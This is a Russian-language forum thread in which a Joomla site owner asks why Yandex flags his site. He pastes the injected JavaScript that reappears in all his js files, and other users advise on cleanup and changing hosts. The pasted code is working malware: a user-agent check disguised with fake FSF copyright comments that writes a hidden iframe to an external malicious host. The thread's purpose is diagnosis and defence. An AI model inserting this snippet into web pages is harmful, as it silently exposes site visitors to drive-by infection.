Вирус на сайте (или неизвестно что) - Безопасность сайтов на Joomla

Прислал мне Яндекс.Вебмастер письмо следующего содержания:
"На страницах вашего сайта radar67.ru обнаружен код, который может быть опасен для посетителей. Выполнение этого кода при посещении сайта может привести к нежелательным для пользователя последствиям: заражению компьютера вредоносными программами, несанкционированному использованию его ресурсов, порче или краже личных данных.
В настоящий момент сайт выводится в результатах поиска  с пометкой «Этот сайт может угрожать безопасности вашего компьютера»."

Проверка архива сайта Касперским и Вебером ничего не дала, сайт чистый. Написал В техподдержку Яндекса, что так мол и так, проверил, сайт чистый.
Они прислали мне код, на который ругается их антивирус. Я проверил все js файлы на сайте и действительно, во всех файлах, в самой первой строке js файлов вставлен следующий код:

/*
Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
*/
function Linode() {
var d = navigator.userAgent;
var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1);
if (!f) {
document.write('<iframe src="http://quwalda.runningfoxes.net/jtrsqgdhstjsjkt14.html" style="position:absolute;le'+'ft:-1340px;t'+'op:-1340px;" height="133" width="133"></iframe>');
}
}
Linode();
/*
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt
*/

Я удалил этот код во всех файлах, залил на сайт, но через 3-5 минут код опять появляется в js файлах.
Подскажите откуда лезет эта зараза и где копать?
PS Google на вирусы на сайте не ругается, только Яндекс.

Не все удалили. Нужно проводить полный аудит сайта.

Если антивирусники не нашли вирус- то устаревшая версия Joomla, уязвимости в сторонних расширениях, кража пароля ftp
Сканер айболит в помощь, искать шелл

Недавно аналогичный случай был при чистке, Яндекс в бан закинул клиента, с похожей структурой заразы, во всех js файлах на сайте, при этом было много мини шеллов, пол дня провозился с подобной ситуацией, после чистки, буквально на следующий день Яндекс отпустил с бана.

Если антивирусники не нашли вирус- то устаревшая версия Joomla, уязвимости в сторонних расширениях, кража пароля ftp
Сканер айболит в помощь, искать шелл

Версия Joomla самая последняя, все пароли, в т.ч. и от ftp поменял

А сайт на хостинге один? Если нет - нужно чистить все одновременно.

Бывают еще проблемы на самом хостинге, очень многие подвержены такому типу уязвимости как реверс, т.е имея нужные знания, можно иметь доступ ко всем площадкам хостинга!

т.е имея нужные знания, можно иметь доступ ко всем площадкам хостинга!

и это как не прискорбно в наше время еще актуально

и это как не прискорбно в наше время еще актуально

Решение одно!, менять хостера, перед чисткой своих клиентов, всегда проверяю возможность реверса и рутабельности, и если выявляется такое, то сразу же говорю клиенту, что возьмусь за чистку только после того, как сменят хостера, жаль, что о вопросе рутабельности не многие знают((

Решение одно!, менять хостера, перед чисткой своих клиентов, всегда проверяю возможность реверса и рутабельности, и если выявляется такое, то сразу же говорю клиенту, что возьмусь за чистку только после того, как сменят хостера, жаль, что о вопросе рутабельности не многие знают((

Хостера менять не хотелось бы, но возможно придется. Кого можете посоветовать?

Хостера менять не хотелось бы, но возможно придется. Кого можете посоветовать?

Могу посоветовать отдельный VDS у того же хостера, а не виртуалку...